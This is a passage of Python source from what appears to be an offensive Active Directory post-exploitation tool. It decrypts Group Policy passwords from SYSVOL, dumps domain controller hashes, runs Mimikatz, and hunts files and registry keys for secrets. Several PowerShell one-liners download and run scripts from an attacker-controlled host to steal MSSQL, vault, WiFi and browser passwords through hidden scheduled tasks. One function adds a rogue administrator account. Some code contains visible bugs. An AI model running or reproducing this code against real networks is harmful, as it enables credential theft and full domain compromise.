-lir cpassword /tmp/\"+randomFoldername\n        resultList = runCommand(cmd, shell = True, timeout = 60) \n        if debugMode==True:\n            print cmd\n            print resultList\n        if len(resultList[1])<1:\n            print (setColor(\"[*]\", bold, color=\"blue\"))+\" \"+dcList[0]+\":445 | \"+username+\":\"+password+\" | \"+(setColor(\"[check sysvol] \", bold, color=\"green\"))+\"No credentials found\"    \n            print \"\\n\"\n        if len(resultList[1])>0:\n            fileList=resultList[1].split(\"\\n\")\n            tmpPassList=[]\n            if len(fileList)>0:\n                print (setColor(\"[*]\", bold, color=\"blue\"))+\" \"+dcList[0]+\":445 | \"+username+\":\"+password+\" | \"+(setColor(\"[sysvol] \", bold, color=\"green\"))+\"Found GPP Passwords\"\n                #print (setColor(\"[+]\", bold, color=\"green\"))+\" Credentials found in SYSVOL folder\"\n                for x in fileList:\n                    x=x.strip()\n                    if len(x)>0:\n                        if len(x.strip())>0:\n                            with open(x, 'r') as myfile:\n                                tmpusername=\"\"\n                                tmppassword=\"\"\n                                content=myfile.read().replace('\\n', '')\n                                m = re.search('userName=\"(\\S*)\"', content)\n                                if m:\n                                    tmpusername = m.group(1)\n                                m = re.search('cpassword=\"(\\S*)\"', content)\n                                if m:\n                                    tmppassword = m.group(1)\n                                    #print \"[*] Base64 Password Found: \"+password\n                                    tmppassword=decryptGPP(tmppassword)\n                                if len(tmpusername)>0 and len(tmppassword)>0:\n                                    tmpusername = tmpusername.lower()\n                                    if [tmpusername,tmppassword] not in tmpPassList:\n                                        tmpPassList.append([tmpusername,tmppassword])\n            if len(tmpPassList)>0:\n                for x in tmpPassList:\n                    print (setColor(\"[*]\", bold, color=\"blue\"))+\" \"+dcList[0]+\":445 | \"+username+\":\"+password+\" | \"+(setColor(\"[sysvol] \", bold, color=\"green\"))+\" Decrypted GPP Password: \"+x[0]+\":\"+x[1] \n                    #print (setColor(\"[+]\", bold, color=\"green\"))+\" Decrypted GPP Password\"            \n                    #headers = [\"Username\",\"Password\"]\n                    #print tabulate(tmpPassList,headers,tablefmt=\"simple\")\n                for x in tmpPassList:\n                    tmpusername=x[0]\n                    tmppassword=x[1]\n                    tmppasswordHash=None\n                    for dc in dcList:\n                        passwordHash=None\n                        tmpLoginOK,tmpAdminOK=testDomainCredentials(tmpusername,tmppassword,tmppasswordHash,dc,domain,False)\n                        if tmpAdminOK==True:\n                            if tmpusername in domainAdminList:\n                                print \"User: '\"+tmpusername+\"' is a 'Domain Admin'\"\n                                if dcCompromised==False:\n                                    print (setColor(\"\\nDumping Hashes from Domain Controller: \"+ip, bold, color=\"green\"))\n                                    tmpHashList=dumpDCHashes(ip,domain,username,password,passwordHash)    \n                                    if len(tmpHashList)>0:\n                                        addHashes(ip,tmpHashList)\n                                        if ip in uncompromisedHostList:\n                                            uncompromisedHostList.remove(ip)\n                                        analyzeHashes(tmpHashList)\n                                    print (setColor(\"\\nDumping Plaintext Credentials from Domain Controller: \"+ip, bold, color=\"green\"))\n                                    tmpPasswordList=runMimikatz(ip,domain,username,password,passwordHash)    \n                                    for y in tmpPasswordList:\n                                        if y not in userPassList:\n                                            userPassList.append(y)\n                                    dcCompromised=True\n                        if tmpLoginOK==True:\n                                print \"User: '\"+tmpusername+\"' is not a 'Domain Admin'\"          \n                                if len(nbList)>0:\n                                    if tmpip in nbList:              \n                                        tmpLoginOK,tmpAdminOK=testDomainCredentials(username,password,passwordHash,tmpip,domain,False)\n                                        if tmpAdminOK==False and tmpLoginOK==False:                        \n                                            if len(nbList)>0 and len(tmpPassList)>0:\n                                                for tmpip in nbList:\n                                                    tmpdomain='workgroup'\n                                                    tmpLoginOK,tmpAdminOK=testDomainCredentials(tmpusername,tmppassword,tmppasswordHash,tmpip,tmpdomain,False)\n                                                    if tmpAdminOk==True:\n                                                        tmpPasswordList=runMimikatz(tmpip,tmpdomain,tmpusername,tmppassword,tmppasswordHash)\n                                                        for y in tmpPasswordList:\n                                                            if y not in userPassList:\n                                                                userPassList.append(y)            \n                                                        if len(tmpPasswordList)>0:\n                                                            print \"\\n\"\n                                                        print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+targetIP+\":445 | \"+domain+\"\\\\\"+username+\":\"+password+\" | \"+(setColor(\"[SAM] \", bold, color=\"green\"))+\"Dumping Hashes\"                                                        \n                                                        #print (setColor(\"[+]\", bold, color=\"green\"))+\" Dumping Hashes from Host: \"+ip\n                                                        tmpHashList=dumpDCHashes(tmpip,tmpdomain,tmpusername,tmppassword,tmppasswordHash)\n                                                        if len(tmpHashList)>0:\n                                                            addHashes(tmpip,tmpHashList)\n                                                            if tmpip in uncompromisedHostList:\n                                                                uncompromisedHostList.remove(tmpip)\n                                                            tmpHostList=[]\n                                                            for z in accessAdmHostList:\n                                                                tmpHostList.append(z[0])\n                                                            if tmpip not in tmpHostList:\n                                                                if [tmpip, tmpdomain, tmpusername, tmppassword] not in accessAdmHostList:\n                                                                        accessAdmHostList.append([tmpip, tmpdomain, tmpusername, tmppassword])\n                                                        analyzeHashes(tmpHashList)\n                                                        if optionTokenPriv==True:\n                                                            if tmpip not in dcList and dcCompromised==False:\n                                                                print (setColor(\"\\nEnumerating Tokens and Attempting Privilege Escalation\", bold, color=\"green\"))\n                                                                tokensPriv(tmpip,tmpdomin,tmpusername,tmpusername,tmppasswordHash)\n\n            else:\n                print \"No credentials found\"\n        cmd = \"umount /tmp/\"+randomFoldername\n        resultList = runCommand(cmd, shell = True, timeout = 15) \n        print \"\\n\"\n    return tmpPassList\n\ndef findInterestingFiles(targetIP,domain,username,password,passwordHash):\n    newCmd=''\n    tmpFileList=[]\n    findFileList=[]\n    findFileList.append('httpd.conf')\n    findFileList.append('ultravnc.ini')\n    findFileList.append('unattend.xml')\n    findFileList.append('sysprep.xml')\n    findFileList.append('sitemanager.xml')\n    findFileList.append('recentservers.xml')\n    findFileList.append('web.config')\n    findFileList.append('*.kdbx')\n    findFileList.append('*.kdb')\n    findFileList.append('*password*.txt')    \n    findFileList.append('*password*.xls')    \n    findFileList.append('*password*.xlsx')    \n    findFileList.append('*password*.doc')    \n    findFileList.append('*password*.docx')    \n    findFileList.append('*password*.pdf')    \n    searchKeywords=\"$searchKeywords=@(\"\n    for x in findFileList:\n        searchKeywords+=\"'\"+x+\"',\"\n    searchKeywords=searchKeywords[0:-1]+\")\"\n    tmpDriveList=[]\n    #command=' -command \"get-psdrive -psprovider filesystem | Select Name, Used | ft -HideTableHeaders\"'\n    command=' get-psdrive -psprovider filesystem | Select Name, Used | ft -HideTableHeaders'\n    psAvailStatus=testPowershell(targetIP, domain, username, password, passwordHash)\n    if psAvailStatus==False:\n        if applockerBypass==True:  \n            chosenNumber=2\n            newCmd=''\n            if chosenNumber==2:\n                newCmd=appLockerBypass3(targetIP, domain, username, password, passwordHash, command)\n            results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, newCmd)    \n            if debugMode==True:\n                print results\n                print status\n\n            tmpResultList=results.split(\"\\n\")\n            for x in tmpResultList:\n                x=x.strip()\n                if len(x)>0:\n                    tmpList1=x.split(\" \")\n                    tmpCount=0\n                    tmpDriveLetter=\"\"\n                    for y in tmpList1:\n                        if len(y)>0:\n                            if tmpCount==0:\n                                tmpDriveLetter=str(y)\n                                tmpCount+=1\n                            else:\n                                tmpCount==1\n                                if int(y)>0:\n                                    tmpDriveList.append(tmpDriveLetter)\n                                    tmpDriveLetter=\"\"\n    else:\n        command=powershellCmdStart+\" \"+command\n        results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n\tif debugMode==True:\n\t\tprint command\n\t\tprint results\n        tmpResultList=results.split(\"\\n\")\n        for x in tmpResultList:\n            x=x.strip()\n            if len(x)>0:\n                tmpList1=x.split(\" \")\n                tmpCount=0\n                tmpDriveLetter=\"\"\n                for y in tmpList1:\n                    if len(y)>0:\n                        if tmpCount==0:\n                            tmpDriveLetter=str(y)\n                            tmpCount+=1\n                        else:\n                            tmpCount==1\n                            print y\n                            if int(y)>0:\n                                tmpDriveList.append(tmpDriveLetter)\n                                tmpDriveLetter=\"\"\n    if len(tmpDriveList)>0:\n        tmpDriveList1=[]\n        for x in tmpDriveList:\n            tmpDriveList1.append(x+\"$\")\n        print (setColor(\"[*]\", bold, color=\"blue\"))+\" \"+targetIP+\":445 | \"+(setColor(\"[drives]\", color=\"green\"))+\" | Found drives: \"+\", \".join(tmpDriveList1)\n    #print \"[*] Finding Files on Host: \"+targetIP\n    for drive in tmpDriveList:\n        #command=' -command '+searchKeywords+'; Get-ChildItem -Path \"'+drive+':\\\" -Recurse -Include \"$searchKeywords\" -Name'\n        command=' '+searchKeywords+'; Get-ChildItem -Path \"'+drive+':\\\" -Recurse -Include \"$searchKeywords\" -Name'\n        if applockerBypass==True:  \n            chosenNumber=2\n            newCmd=''\n            if chosenNumber==2:\n                newCmd=appLockerBypass3(targetIP, domain, username, password, passwordHash, command)\n            if debugMode==True:\n                print newCmd\n            results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, newCmd)    \n        else:\n            command=powershellPath+' '+powershellArgs+' '+command\n            if debugMode==True:\n                print command\n            results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n        if \"Cannot find path\" not in str(results):\n            tmpResultList=results.split(\"\\n\")\n            for x in tmpResultList:\n                if len(x)>0:\n                    filename=drive+\":\\\\\"+x\n                    if drive+\":\\\\Windows\" not in filename and filename.count(\"\\\\\")>1:\n                        if filename not in tmpFileList:\n                            tmpFileList.append(filename)\n    #print (setColor(\"[+]\", bold, color=\"green\"))+\" List of Interesting Files Found\"\n    for filename in tmpFileList:\n        print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+targetIP+\":445 | \"+(setColor(\"[found file\", color=\"green\"))+\" | \"+filename\n    print \"\\n\"\n    #results=runPSEXEC(targetIP, domain, username, password, passwordHash, command)    \n    return tmpFileList\n\ndef findInterestingRegKeys(targetIP,domain,username,password,passwordHash):\n    interestingRegList = []\n    interestingRegList.append(['HKLM\\\\SOFTWARE\\\\RealVNC\\\\WinVNC4','Password'])\n    interestingRegList.append(['HKCU\\\\Software\\\\ORL\\\\WinVNC3', 'Password'])\n    interestingRegList.append(['HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\Currentversion\\\\Winlogon', 'DefaultUsername'])\n    interestingRegList.append(['HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\Currentversion\\\\Winlogon', 'DefaultPassword'])\n    interestingRegList.append(['HKLM\\SYSTEM\\ControlSet\\services\\SNMP\\Parameters\\ValidCommunities', ''])\n    interestingRegList.append(['HKU\\\\Software\\\\SimonTatham\\\\Putty\\\\Sessions', ''])\n    for x in interestingRegList:\n        keyPath = x[0]\n        selectedKey = x[1]\n        results = readRemoteRegistry(targetIP,domain,username,password,passwordHash,keyPath,selectedKey)\n        if results != None:\n            if 'Putty' in x[0]:\n                for y in results:\n                    keyPath1 = keyPath + '\\\\' + y\n                    selectedKey = 'ProxyPassword'\n                    results = readRemoteRegistry(targetIP,domain,username,password,passwordHash,keyPath1,selectedKey)\n                    if results != None:\n                        if passwordHash != None:\n                            tmpRegResultList1.append([targetIP,keyPath1 + '\\\\' + selectedKey,results])\n                        else:\n                            tmpRegResultList1.append([targetIP,keyPath1 + '\\\\' + selectedKey,results,])\n            else:\n                if passwordHash != None:\n                    tmpRegResultList1.append([targetIP,keyPath + '\\\\' + selectedKey,results])\n                else:\n                    tmpRegResultList1.append([targetIP,keyPath + '\\\\' + selectedKey,results])\n    return tmpRegResultList1\n\ndef runDumpMSSQL(targetIP,domain,username,password,passwordHash): \n    #https://github.com/NetSPI/PowerUpSQL   \n    print setColor('\\nDumping MSSQL Service Credentials', bold, color='red')\n    command=\"-Command (New-Object Net.WebClient).DownloadFile(\\'http://\"+myIP+\":8000/PowerUpSQL.psd1\\','C:\\windows\\\\temp\\PowerUpSQL.psd1'); (New-Object Net.WebClient).DownloadFile(\\'http://\"+myIP+\":8000/PowerUpSQL.ps1\\','C:\\windows\\\\temp\\PowerUpSQL.ps1'); (New-Object Net.WebClient).DownloadFile(\\'http://\"+myIP+\":8000/PowerUpSQL.psm1\\','C:\\windows\\\\temp\\PowerUpSQL.psm1'); (New-Object Net.WebClient).DownloadFile(\\'http://\"+myIP+\":8000/Inveigh.ps1\\','c:\\windows\\\\temp\\Inveigh.ps1'); (New-Object Net.WebClient).DownloadFile(\\'http://\"+myIP+\":8000/Inveigh.ps1\\Get-SQLServiceAccountPwHash3.ps1\\','c:\\windows\\\\temp\\Get-SQLServiceAccountPwHash3.ps1'); Import-Module C:\\windows\\\\temp\\PowerUpSQL.psm1; Import-Module C:\\windows\\\\temp\\Inveigh.ps1; Import-Module C:\\windows\\\\temp\\Get-SQLServiceAccountPwHashes.ps1; Get-SQLServiceAccountPwHashes -Verbose -TimeOut 5 -CaptureIp \"+targetIP\n    #print powershellCmdStart+command\n    results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, powershellCmdStart+command)  \n    tmpResultList=results.split(\"\\n\")\n    found1=False\n    found2=False\n    tmpHashList=[]\n    for x in tmpResultList:\n        if found2==True:\n            x=x.strip()\n            if x not in tmpHashList:\n                tmpHashList.append(x) \n        if 'Final List of Captured password hashes:' in x:\n            found1=True\n        if found1==True:\n            if '---------------------------------------' in x:\n                found2=True\n    if len(tmpHashList)<1:\n        print \"No credentials captured\"\n    return tmpHashList        \n\ndef runDumpVault(targetIP,domain,username,password,passwordHash):    \n    tmpResultList=[]\n    powershellPath=getPowershellPath(targetIP,domain,username,password,passwordHash)\n    powershellArgs=' -windowstyle hidden -NoProfile -NoLogo -NonInteractive -Sta -ep bypass '\n    command=powershellPath+\" \"+powershellArgs+\" \\\"IEX (New-Object Net.WebClient).DownloadString(\\'http://\"+myIP+\":8000/Get-VaultCredential.ps1\\'); Get-VaultCredential\\\"\"\n    if debugMode==True:\n        print command\n    results=runPSEXEC(targetIP, domain, username, password, passwordHash, powershellCmdStart+command)   \n    tmpResultList=results.split(\"\\n\")\n    return tmpResultList    \n\ndef dumpWifi(targetIP,domain,username,password,passwordHash):\n    #netsh wlan add profile filename=\"wlan.xml\" interface=\"Wireless Network Connection\" user=current\n    #https://gist.github.com/milo2012/7ba74a4451f19a96078597d1f5b85dad/raw/85d9f2364116f99db78bf6993df2d42e106b5baf/wirelessProfile.xml\n    '''\n    <?xml version=\"1.0\" encoding=\"US-ASCII\"?>\n    <WLANProfile xmlns=\"http://www.microsoft.com/networking/WLAN/profile/v1\">\n        <name>SampleWPAPSK</name>\n        <SSIDConfig>\n            <SSID>\n                <name>SampleWPAPSK</name>\n            </SSID>\n        </SSIDConfig>\n        <connectionType>ESS</connectionType>\n        <connectionMode>auto</connectionMode>\n        <autoSwitch>false</autoSwitch>\n        <MSM>\n            <security>\n                <authEncryption>\n                    <authentication>WPAPSK</authentication>\n                    <encryption>TKIP</encryption>\n                    <useOneX>false</useOneX>\n                </authEncryption>\n            </security>\n        </MSM>\n    <sharedKey>\n        <keyType>passPhrase</keyType>\n        <protected>false</protected>\n        <keyMaterial> <!-- insert key here --> </keyMaterial>\n    </sharedKey>    \n    </WLANProfile>\n    '''    \n    domain=domain.strip()\n    results=[]\n    tempFilename = tempfile.NamedTemporaryFile(dir='.').name\n    tempFilename += '.ps1'\n    tempFilename = tempFilename.replace(os.getcwd() + '/', '')\n    powershellPath=getPowershellPath(targetIP,domain,username,password,passwordHash)\n    powershellArgs=' -windowstyle hidden -NoProfile -NoLogo -NonInteractive -Sta -ep bypass '\n    command=powershellPath+\" \"+powershellArgs+\" IEX \\\"(New-Object Net.WebClient).DownloadString(\\'http://\"+myIP+\":8000/WiFi-Password.psm1\\'); Show-WiFiPassword\\\"\"\n    if debugMode==True:\n        print command\n    if len(domain)<1:\n        domain=\"WORKGROUP\"\n    results=runPSEXEC(targetIP, domain, username, password, passwordHash, command)\n    resultList=results.split(\"\\n\")\n    tmpResultList=[]   \n    tmpSSID=''\n    tmpPassword=''\n    tmpAuthType='' \n    for x in resultList:\n        if \"SSID       :\" in x:\n            x=(x.replace(\"SSID       :\",\"\")).strip()\n            if len(x)>0:\n                tmpSSID=x\n        if \"Password   :\" in x:\n            x=(x.replace(\"Password   :\",\"\")).strip()\n            if len(x)>0:\n                tmpPassword=x\n        if \"Auth type  :\" in x:\n            x=(x.replace(\"Auth type  :\",\"\")).strip()\n            if len(x)>0:\n                tmpAuthType=x\n        if len(tmpSSID)>0:\n            tmpResultList.append([tmpSSID,tmpPassword,tmpAuthType])\n    return tmpResultList\n\ndef dumpBrowser(targetIP,domain,username,password,passwordHash):\n    tmpPasswordList=[]\n    print \"[*] Checking Installed Browsers on Host: \"+targetIP\n    appList=getInstalledPrograms(targetIP,domain,username,password,passwordHash)\n    for appName in appList:\n        if \"Google Chrome\" in str(appName):\n            print \"Google Chrome\"\n        if \"Mozilla\" in str(appName):\n            print \"Mozilla Firefox\"\n            print \"\\n\"    \n    tmpFound=False\n    tmpBrowserList=[]\n    for appName in appList:\n        if \"Google Chrome\" in str(appName) or \"Mozilla\" in str(appName):    \n            if \"Google Chrome\" in str(appName):\n                tmpBrowserList.append(\"chrome\")\n            if \"Mozilla\" in str(appName):\n                tmpBrowserList.append(\"firefox\")\n            tmpFound=True\n    if tmpFound==False:\n        print \"Google Chrome and Mozilla Firefox Browsers Not Found on Host: \"+targetIP\n    if tmpFound==True:        \n        print \"[*] Checking Currently Logged On Users on Host: \"+targetIP\n        powershellPath=getPowershellPath(targetIP,domain,username,password,passwordHash)\n        powershellArgs=' -windowstyle hidden -NoProfile -NoLogo -NonInteractive -Sta -ep bypass '\n        command=' -Command \"Get-WMIObject -class Win32_ComputerSystem | select username\"'\n        command=powershellPath+\" \"+powershellArgs+command\n        if debugMode==True:\n            print command\n        if len(password)>0:\n            passwordHash=None\n        results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n        tmpResultList=results.split(\"\\n\")\n        foundStart=False\n        loggedInUsersList=[]\n        for x in tmpResultList:\n            x=x.strip()            \n            if len(x)>0:\n                if foundStart==True:\n                    if x not in loggedInUsersList:\n                        loggedInUsersList.append(x)                            \n                if '--------' in x:\n                    foundStart=True\n        if len(loggedInUsersList)>0:\n            print \"[*] Currently Logged In Users\"\n            for x in loggedInUsersList:\n                print x\n\n        tmpFoundAccounts=[]\n        for x in loggedInUsersList:\n            if \"\\\\\" in x:\n                tmpdomain=(x.split(\"\\\\\")[0]).lower()\n                tmpusername=(x.split(\"\\\\\")[1]).lower()\n                tmpFoundAccounts.append([tmpdomain,tmpusername])\n                #for y in userPassList:\n                #    tmpdomain1=(y[1]).lower()\n                #    tmpusername1=(y[2]).lower()\n                #    if tmpdomain in tmpdomain1 and tmpusername==tmpusername1:\n                #        tmpFoundAccounts.append(y)\n            else:\n                tmpusername=x\n                tmpFoundAccounts.append([\"workgroup\",tmpusername])\n                #for y in userPassList:\n                #    tmpdomain1=(y[1]).lower()\n                #    tmpusername1=(y[2]).lower()\n                #    if x==tmpusername1:\n                #        tmpFoundAccounts.append(y)\n        if len(tmpFoundAccounts)>0:\n            for x in tmpFoundAccounts:\n                tmpdomain=x[0]\n                tmpusername=x[1]\n\n                #print \"[*] Found the Below Credentials in Database\"\n                #print tabulate(tmpFoundAccounts)\n                if \"firefox\" in tmpBrowserList:\n                    print \"\\n[*] Dumping Firefox Passwords from Host: \"+targetIP                        \n                    #print \"[*] Uploading Script to Host: \"+targetIP\n                    outputFilename=generateRandomStr()+\".txt\"\n                    batFilename=generateRandomStr()+\".bat\"\n                    tmpSchedName=generateRandomStr()\n                    #s='IEX (New-Object Net.WebClient).DownloadString(\\'http://'+myIP+':8000/BrowserGather.ps1\\'); Get-ChromeCreds | Out-File C:\\\\windows\\\\temp\\\\'+outputFilename\n                    s='IEX (New-Object Net.WebClient).DownloadString(\\'http://'+myIP+':8000/Get-FoxDump.ps1\\'); Get-FoxDump -OutFile C:\\\\windows\\\\temp\\\\'+outputFilename\n                    encodedPS=powershell_encode(s)\n                    cmd = \"C:\\windows\\sysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -windowstyle hidden -NoProfile -NoLogo -NonInteractive -Sta -ep bypass -ec \"+encodedPS\n                    target = open(batFilename, 'w')\n                    target.write(cmd)\n                    target.close()\n                    uploadFile(batFilename,batFilename,targetIP, domain, username, password, passwordHash)\n                \n                    #print \"[*] Scheduling Tasks on Host: \"+targetIP\n                    command='schtasks.exe /Delete /TN '+tmpSchedName+' /f'\n                    results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n                    command='schtasks.exe /Create /RL HIGHEST /RU '+tmpdomain+'\\\\'+tmpusername+' /TN '+tmpSchedName+' /SC MONTHLY /M DEC /TR \"'\"C:\\\\windows\\\\temp\\\\\"+batFilename+\"\\\"\"\n                    if debugMode==True:\n                        print command\n                    results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)   \n                    if \"ERROR\" in str(results):\n                        print results\n                    else: \n                        #print \"[*] Running Tasks on Host: \"+targetIP\n                        command='schtasks /Run /TN '+tmpSchedName    \n                        results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n                        checkComplete=False\n                        while checkComplete==False:\n                            command='schtasks /Query /TN '+tmpSchedName\n                            results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)            \n                            tmpResultList=results.split(\"\\n\")\n                            for x in tmpResultList:\n                                if tmpSchedName in x:\n                                    if \"Ready\" in x or \"Running\" in x:\n                                        if \"Ready\" in x:\n                                            #print \"[*] Removing Tasks from Host: \"+targetIP\n                                            command='schtasks.exe /Delete /TN '+tmpSchedName+' /f'                \n                                            runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n                                            checkComplete=True\n                                        if \"Running\" in x:\n                                            time.sleep(10)\n                        filename=\"C:\\\\windows\\\\temp\\\\\"+outputFilename\n                        tmpFilename=(downloadFile(targetIP,domain,username,password,filename))\n                        if os.path.exists(tmpFilename):\n                            tmpFilename1=convertWinToLinux(tmpFilename)\n                            with open(tmpFilename1) as f:\n                                content = f.readlines()     \n                                tmpFound=False                    \n                                for y in content:\n                                    if tmpFound==True:\n                                        tmpList1=y.split(\" \")\n                                        tmpPass=''\n                                        tmpUrl=''\n                                        tmpCount=0\n                                        for z in tmpList1:\n                                            if len(z)>0:\n                                                if tmpCount==0:\n                                                    tmpPass=z\n                                                else:\n                                                    tmpUrl=z\n                                                tmpCount+=1\n                                        tmpPasswordList.append([tmpPass,tmpUrl])\n                                    if \"--------\" in y:\n                                        tmpFound=True     \n                if \"chrome\" in tmpBrowserList:\n                    print \"\\n[*] Dumping Chrome Passwords from Host: \"+targetIP                        \n                    #print \"[*] Uploading Script to Host: \"+targetIP\n                    outputFilename=generateRandomStr()+\".txt\"\n                    batFilename=generateRandomStr()+\".bat\"\n                    tmpSchedName=generateRandomStr()\n                    #s='IEX (New-Object Net.WebClient).DownloadString(\\'http://'+myIP+':8000/BrowserGather.ps1\\'); Get-ChromeCreds | Out-File C:\\\\windows\\\\temp\\\\'+outputFilename\n                    s='IEX (New-Object Net.WebClient).DownloadString(\\'http://'+myIP+':8000/BrowserGather.ps1\\'); Get-ChromeCreds | Out-File C:\\\\temp\\\\'+outputFilename\n                    encodedPS=powershell_encode(s)\n                    cmd = powershellPath+\" -windowstyle hidden -NoProfile -NoLogo -NonInteractive -Sta -ep bypass -ec \"+encodedPS\n                    target = open(batFilename, 'w')\n                    target.write(cmd)\n                    target.close()\n                    uploadFile(batFilename,batFilename,targetIP, domain, username, password, passwordHash)\n                \n                    #print \"[*] Scheduling Tasks on Host: \"+targetIP\n                    command='schtasks.exe /Delete /TN '+tmpSchedName+' /f'\n                    results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n                    command='schtasks.exe /Create /RL HIGHEST /RU '+tmpdomain+'\\\\'+tmpusername+' /TN '+tmpSchedName+' /SC MONTHLY /M DEC /TR \"'\"C:\\\\windows\\\\temp\\\\\"+batFilename+\"\\\"\"\n                    if debugMode==True:\n                        print command\n                    results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)   \n                    if \"ERROR\" in str(results):\n                        print results\n                    else: \n                        #print \"[*] Running Tasks on Host: \"+targetIP\n                        command='schtasks /Run /TN '+tmpSchedName    \n                        results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n                        checkComplete=False\n                        while checkComplete==False:\n                            command='schtasks /Query /TN '+tmpSchedName\n                            results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)            \n                            tmpResultList=results.split(\"\\n\")\n                            for x in tmpResultList:\n                                if tmpSchedName in x:\n                                    if \"Ready\" in x or \"Running\" in x:\n                                        if \"Ready\" in x:\n                                            #print \"[*] Removing Tasks from Host: \"+targetIP\n                                            command='schtasks.exe /Delete /TN '+tmpSchedName+' /f'                \n                                            runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n                                            checkComplete=True\n                                        if \"Running\" in x:\n                                            time.sleep(10)\n                        filename=\"C:\\\\temp\\\\\"+outputFilename\n                        tmpFilename=(downloadFile(targetIP,domain,username,password,filename))\n                        with open(tmpFilename) as f:\n                            lines = f.read().splitlines()                        \n                            for z in lines:\n                                print z\n                        os.remove(batFilename)\n        else:\n            print \"[*] No matching credentials found in database\"\n    return tmpPasswordList\n\ndef dumpIIS(targetIP,domain,username,password,passwordHash):  \n    tmpResultList=[] \n    powershellPath=getPowershellPath(targetIP,domain,username,password,passwordHash)\n    powershellArgs=' -windowstyle hidden -NoProfile -NoLogo -NonInteractive -Sta -ep bypass '\n    #command=powershellPath+\" \"+powershellArgs+\" \\\"IEX (New-Object Net.WebClient).DownloadString(\\'http://\"+myIP+\":8000/get-applicationhost.ps1\\'); Get-ApplicationHost | Format-Table -Autosize\\\"\"\n    #command=powershellPath+\" \"+powershellArgs+\" -Command \\\"(New-Object Net.WebClient).DownloadFile(\\'http://'+myIP+':8000/get-applicationhost.ps1\\',\\'%temp%\\get-applicationhost.ps1\\'); . %temp%\\get-applicationhost.ps1; Get-ApplicationHost | Format-Table -Autosize\\\"\"\n    #command=powershellPath+\" \"+powershellArgs+\"-Command \\\"(New-Object Net.WebClient).DownloadFile(\\'http://\"+myIP+\":8000/get-applicationhost.ps1\\',\\'%temp%\\get-applicationhost.ps1\\'); . %temp%\\get-applicationhost.ps1\\\"\"\n    command=powershellPath+\" \"+powershellArgs+\" IEX (New-Object Net.WebClient).DownloadFile(\\'http://\"+myIP+\":8000/get-applicationhost.ps1\\',\\'%temp%\\get-applicationhost.ps1\\'); . %temp%\\get-applicationhost.ps1\"\n    results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, powershellCmdStart+command)    \n    if debugMode==True:\n        print command\n        print results\n    username=\"\"\n    domain=\"\"\n    password=\"\"\n    if \"Appcmd.exe does not exist in the default location\" not in str(results):\n        return tmpResultList\n    else:\n        return []\n\ndef localPrivEscalation():\n    cmd='powershell \"IEX (New-Object Net.WebClient).DownloadString(\\'http://is.gd/fVC1Yd\\'); Invoke-Tater -Trigger 1 -Command \"\"net user tater Winter2016 /add && net localgroup administrators tater /add\"\"\"'\n    print cmd\n    return True\n\ndef setDateTime(date1):\n    cmd = 'date -s \"'+date1+'\"'\n    runCommand1(cmd) \n\ndef compareTime(date1,date2):\n    tmp1=date1.split(\" \")\n    count=0\n    for x in tmp1:\n        if len(x)>0:\n            if count==2:\n                day1=x\n            if count==1:\n                mth1=convertMth(x)\n            if (x.count(\":\"))>1:\n                time1=x\n            count+=1\n    year1=tmp1[-1]\n    hour1=time1.split(\":\")[0]\n    min1=time1.split(\":\")[1]\n\n    tmp2=date2.split(\" \")\n    count=0\n    for x in tmp2:\n        if len(x)>0:\n            if count==2:\n                day2=x\n            if count==1:\n                mth2=convertMth(x)\n            if (x.count(\":\"))>1:\n                time2=x\n            count+=1\n    year2=tmp2[-1]\n    hour2=time2.split(\":\")[0]\n    min2=time2.split(\":\")[1]\n\n    if year1==year2 and mth1==mth2 and day1==day2 and hour1==hour2:\n        if (int(min1)-int(min2)<5):\n            return True\n        else:\n            return False\n    else:\n        newDateTime=day1+\" \"+convertMthNum(mth1)+\" \"+year1+\" \"+time1\n        setDateTime(newDateTime)\n        return False\n\n\ndef isOpen(ip,port):\n    global liveList\n    try:\n        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        s.settimeout(5)\n        s.connect((ip, int(port)))\n        if [ip,port] not in liveList:\n            liveList.append([ip,port])\n        s.close()\n        return True\n    except Exception as e:\n        return False\n\ndef scanThread(ip, port):\n    try:\n        t = threading.Thread(target=isOpen, args=(ip, port))\n        t.start()\n    except Exception:\n        pass\n\ndef syncDateTime(dateTime1):\n    print \"[*] Syncing Date/Time with Remote DC\"\n    mth1=dateTime1.split(\" \")[1]    \n    day1=dateTime1.split(\" \")[0]    \n    year1=dateTime1.split(\" \")[-1]    \n    time1=dateTime1.split(\" \")[3]  \n    hour1=time1.split(\":\")[0]\n    minute1=time1.split(\":\")[1]\n    sec1=time1.split(\":\")[2]\n    \n    cmd='timedatectl set-ntp 0'\n    resultList = runCommand(cmd, shell = True, timeout = 30)\n    cmd='date --set '+year1+'-'+convertMth(mth1)+'-'+day1\n    resultList = runCommand(cmd, shell = True, timeout = 30)\n    cmd='date --set '+hour1+':'+minute1+':'+sec1\n    resultList = runCommand(cmd, shell = True, timeout = 30)\n\ndef convertMth(text):\n    if text==\"Jan\":\n        return \"1\"\n    if text==\"Feb\":\n        return \"2\"\n    if text==\"Mar\":\n        return \"3\"\n    if text==\"Apr\":\n        return \"4\"\n    if text==\"May\":\n        return \"5\"\n    if text==\"Jun\":\n        return \"6\"\n    if text==\"Jul\":\n        return \"7\"\n    if text==\"Aug\":\n        return \"8\"\n    if text==\"Sep\":\n   